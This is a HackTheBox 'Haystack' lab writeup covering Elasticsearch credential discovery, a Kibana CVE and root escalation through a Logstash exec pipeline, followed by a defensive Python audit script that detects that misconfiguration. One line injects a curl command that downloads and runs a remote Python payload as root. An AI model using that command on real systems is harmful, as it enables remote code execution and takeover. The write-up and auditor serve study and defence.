Haystack — HackTheBox Writeup

Haystack retires this week. It was an easy-difficulty box where we see some stego and get initial credentials from an Elasticsearch database. With those credentials we can SSH in, and by exploiting CVE-2018-17246 in Kibana I get a shell as the kibana user. The kibana user has access to the Logstash configuration, which is misconfigured so that a line written to a log file it reads is run as a command by root.

Preetham Bomma
Nov 7 · 5 min read

Enumeration and Recon

Let's start off with an nmap scan:

80 — HTTP

The website looks like this:

Elasticsearch — 9200

It's running Elasticsearch version 6.4.2. I read its documentation to get an overview of it.

Shell as security

Privesc to Kibana

We can safely assume that we are working on an ELK stack, which stands for
Elasticsearch, Logstash, Kibana.

ssh security@10.10.10.115 -L 5601:127.0.0.1:5601

Shell as Kibana

Privesc to Root

The Logstash configuration files live in /etc/logstash/conf.d:

input.conf

input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}

filter.conf

filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}

output.conf

output {
  if [type] == "execute" {
    stdout { codec => json }
    exec {
      command => "%{comando} &"
    }
  }
}
The file input reads /opt/kibana/logstash_*, grok pulls everything after "Ejecutar comando:" into the comando field, and the exec output runs that field as a shell command, so a line in this format written to a matching file is executed by root:

Ejecutar comando: curl 10.10.15.236/pyshell.py -o /tmp/kk.py;python /tmp/kk.py
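The dangerous property of this pipeline is the chain file input -> grok on the raw message -> exec output interpolating the grok field, combined with a watched path that non-root users can write to. The following audit script is an added example, not part of the writeup or of Logstash: it parses copies of the three files above (embedded as constructed strings), reports any exec command that interpolates an event field, links such fields back to grok captures on the message, and checks whether the directory behind each file input is writable by non-root users. The regex parsing is deliberately narrow (one pipeline, double-quoted values) and the helper names are my own.

```python
"""Audit Logstash conf.d files for the file -> grok -> exec pattern from the writeup.

Added example (not the writeup's or Logstash's code). Reports:
  1. exec outputs whose command interpolates event fields (%{field});
  2. whether those fields are carved out of the raw message by grok;
  3. whether the directory of each file input can be written by non-root users.
"""
import os
import re
import stat
import tempfile
from pathlib import Path

# Constructed copies of the three pipeline files shown in the writeup.
INPUT_CONF = """input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}
"""
FILTER_CONF = """filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\\s*comando\\s*:\\s+%{GREEDYDATA:comando}" }
    }
  }
}
"""
OUTPUT_CONF = """output {
  if [type] == "execute" {
    stdout { codec => json }
    exec {
      command => "%{comando} &"
    }
  }
}
"""

FILE_PATH_RE = re.compile(r'file\s*\{[^}]*?path\s*=>\s*"([^"]+)"')   # file { path => "..." }
EXEC_CMD_RE = re.compile(r'exec\s*\{[^}]*?command\s*=>\s*"([^"]*)"')  # exec { command => "..." }
FIELD_REF_RE = re.compile(r'%\{([^}:]+)\}')        # %{comando}: event field reference
GROK_CAPTURE_RE = re.compile(r'%\{\w+:(\w+)\}')    # %{GREEDYDATA:comando}: grok capture


def dir_writable_by_non_root(pattern):
    """For a file-input path or glob, inspect its parent directory.
    True  -> group/other write bit set, or the owner is not root (non-root can write);
    False -> root-owned and writable by owner only;
    None  -> directory does not exist on this host."""
    parent = Path(pattern).parent
    if not parent.is_dir():
        return None
    st = parent.stat()
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)) or st.st_uid != 0


def audit_pipeline(conf_dir):
    """Return a list of report lines for all *.conf files in conf_dir."""
    text = "\n".join(p.read_text() for p in sorted(Path(conf_dir).glob("*.conf")))
    grok_fields = set(GROK_CAPTURE_RE.findall(text))
    report = []
    for cmd in EXEC_CMD_RE.findall(text):
        refs = sorted(set(FIELD_REF_RE.findall(cmd)))
        if not refs:
            continue
        report.append(f"exec command {cmd!r} interpolates event field(s) {refs}")
        for field in refs:
            if field in grok_fields:
                report.append(f"field '{field}' is extracted from the raw message by grok, "
                              f"so log content reaches the shell")
    status_text = {None: "directory not present on this host",
                   True: "directory writable by non-root users",
                   False: "directory writable by root only"}
    for pattern in FILE_PATH_RE.findall(text):
        report.append(f"file input {pattern}: {status_text[dir_writable_by_non_root(pattern)]}")
    return report


def write_demo_conf(dest):
    """Write the constructed pipeline files into dest, a stand-in for /etc/logstash/conf.d."""
    dest = Path(dest)
    for name, body in (("input.conf", INPUT_CONF), ("filter.conf", FILTER_CONF),
                       ("output.conf", OUTPUT_CONF)):
        (dest / name).write_text(body)
    return dest


def run_demo():
    """Audit the constructed pipeline from a temporary directory and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_pipeline(write_demo_conf(tmp))


def demo_writable_check():
    """Check a world-writable temp directory the way /opt/kibana would be checked on the box."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp) / "kibana"
        d.mkdir()
        os.chmod(d, 0o777)
        return dir_writable_by_non_root(str(d / "logstash_*"))


if __name__ == "__main__":
    for line in run_demo():
        print("REPORT:", line)
    print("world-writable sample dir flagged:", demo_writable_check())
```

Pointing audit_pipeline at a real /etc/logstash/conf.d gives the same three kinds of lines; any exec output fed from grok on a user-writable file is the combination to fix, either by dropping the exec output or by moving the watched path to a root-owned, non-writable directory.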

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Written by Preetham Bomma

Cyber Security Enthusiast. Youtuber. Abacus Grand Master. My playlist https://www.youtube.com/playlist?list=PLprCnFT-0k_g8PEeDP-EQhZ9hSHUlbRVS
